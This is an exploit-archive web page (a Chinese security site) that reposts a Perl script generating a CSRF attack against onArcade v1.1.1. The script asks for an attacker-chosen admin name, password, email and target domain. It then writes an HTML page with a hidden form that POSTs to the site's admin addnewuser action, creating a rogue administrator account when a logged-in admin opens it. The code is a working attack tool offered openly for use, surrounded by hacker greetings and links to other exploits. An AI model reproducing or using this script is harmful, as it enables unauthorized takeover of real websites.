首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability
来源:or4ng3m4n.blogspot.com 作者:Or4nG.M4n 发布时间:2011-05-12  
#!usr/bin/perl
###################################################
#  Title    : onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability
#  Software : onArcade Game
#  Version  : 1.1.1
#  Date     : n/a
#  Author   : Or4nG.M4n
#  visit    : or4ng3m4n.blogspot.com
##################################################
# Start Code
print q(
+----------------------------------------+
| CSRF CREATE YOUR Exploit By 0r4Ng.M4n  |
|    visit : Or4ng3M4n.BlogSpot.com      |
+----------------------------------------+
);
# add Page name For safe Exploit
print "save as :";
$safe=<STDIN>;
# add admin name
print "admin name :";
$ad=<STDIN>;
# add admin pass
print "admin pass :";
$ps=<STDIN>;
# add admin email
print "admin Email :";
$em=<STDIN>;
# add host domain
print "domain :";
$ho=<STDIN>;
# add path script : if you don't add path just Entr
print "path :";
$ph=<STDIN>;
open(CREATE,">>$safe");
print CREATE "
<HTML><HEAD><TITLE>Exploit .. By Or4nG.M4n</TITLE>
<form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'>
<input type='hidden' value='$ad' name='eusername' ></td>
<input type='hidden' value='$ps' name='euserpassword' ></td>
<input type='hidden' value='$em' name='euseremail' >
<select name='eusergroup'><option value='2'></option></select></td>
<select name='euserstatus'><option value='1'></option></select></td>
<input type='submit' name='submit' value='add' ></td>";
close(CREATE);
print "d0n3\n";
print q(
+---------------------------------------------------+
|  # -------------[GreEtz & Thnks]------------- #   |
| Greetz : Fox , Lagripe-dz , SarBoT511 , SadHaCkEr |
| i-Hmx , xss mAn , Cyb3r-sA , Dr.TaiGar , h3llc0d3 |
|        BiG Thnks : sa^dev!L , Lagripe-dz          |
+---------------------------------------------------+
| or4ng3m4n.blogspot.com | sec4ever | v4-team | 7rs |
);
# End Code
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chasys Media Player 2.0 Buffer
·SPlayer 3.7 Content-Type Buffe
·ICONICS WebHMI ActiveX Buffer
·Symantec Backup Exec System Re
·SlimPDF Reader PoC
·A-PDF All to MP3 Converter v.2
·(Firefox & Safari & IE) + Quic
·A-PDF Wav to MP3 Converter v 1
·Adobe Audition 3.0 (build 7283
·Win32 VB6_vbaExceptHandler - S
·Chasys Media Player Buffer Ove
·DreamBox DM500(+) Arbitrary Fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved